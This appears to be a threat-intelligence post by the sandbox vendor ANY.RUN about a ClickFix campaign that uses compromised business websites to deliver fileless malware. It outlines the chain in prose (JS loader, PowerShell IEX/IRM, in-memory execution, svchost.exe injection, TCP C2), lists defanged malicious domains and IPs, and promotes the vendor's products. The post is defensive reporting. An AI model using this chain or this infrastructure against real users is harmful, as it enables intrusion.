ANY.RUN

๐Ÿšจ ๐—Ÿ๐—ฒ๐—ด๐—ถ๐˜๐—ถ๐—บ๐—ฎ๐˜๐—ฒ ๐—•๐Ÿฎ๐—• ๐—ช๐—ฒ๐—ฏ๐˜€๐—ถ๐˜๐—ฒ๐˜€ ๐—”๐—ฏ๐˜‚๐˜€๐—ฒ๐—ฑ ๐—ณ๐—ผ๐—ฟ ๐—™๐—ถ๐—น๐—ฒ๐—น๐—ฒ๐˜€๐˜€ ๐— ๐—ฎ๐—น๐˜„๐—ฎ๐—ฟ๐—ฒ ๐——๐—ฒ๐—น๐—ถ๐˜ƒ๐—ฒ๐—ฟ๐˜†: ๐——๐—ฒ๐˜๐—ฒ๐—ฐ๐˜ ๐—œ๐˜ ๐—˜๐—ฎ๐—ฟ๐—น๐˜†
Weโ€™re tracking widespread #ClickFix activity using compromised legitimate websites to deliver fileless malware, lowering suspicion and delaying detection.

โš ๏ธ Finance, banking, healthcare, manufacturing, and tech are among the most exposed industries.

โ—๏ธ The activity looks low-risk until fileless execution and outbound C2 traffic are already established. Attackers inject a lightweight inline JavaScript loader into compromised sites, which retrieves a second-stage payload directly into the victimโ€™s browser from external infrastructure.

The attack chain blends into normal web traffic, relies on PowerShell and in-memory execution, and later shifts C2 communication into the legitimate system process svchost.exe, making malicious activity harder to distinguish from routine system behavior for SOC and MSSP teams.

โšก๏ธ #ANYRUN Sandbox helps teams validate suspicious activity faster and contain fileless attacks before they escalate. Analysts can observe the full execution chain in real time:
Inline JS loader โžก๏ธ User-executed PowerShell (IEX/IRM) โžก๏ธ Hidden second-stage PowerShell and loader retrieval โžก๏ธ Fileless in-memory execution inside powershell.exe โžก๏ธ Follow-on .NET payload delivery โžก๏ธ svchost.exe injection โžก๏ธ Custom TCP C2 ๐Ÿšจ

๐Ÿ‘จโ€๐Ÿ’ป Learn how #ANYRUN helps security teams detect complex threats and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoenterprise&utm_term=200526

๐Ÿ“ˆ Scale your SOC with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: https://app.any.run/plans/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoplans&utm_term=200526

IOCs:
/jsrepo?rnd=
/teamrepo?rnd=

ntdnewtds[.]shop
dnsnewtds[.]shop
sdntds[.]shop
newtdsone[.]shop
nttdss[.]shop
Dntds[.]shop

178[.]16[.]52[.]232
158[.]94[.]208[.]92
158[.]94[.]208[.]104
91[.]92[.]243[.]161

#cybersecurity #infosec

May 20 at 1:07pmWeb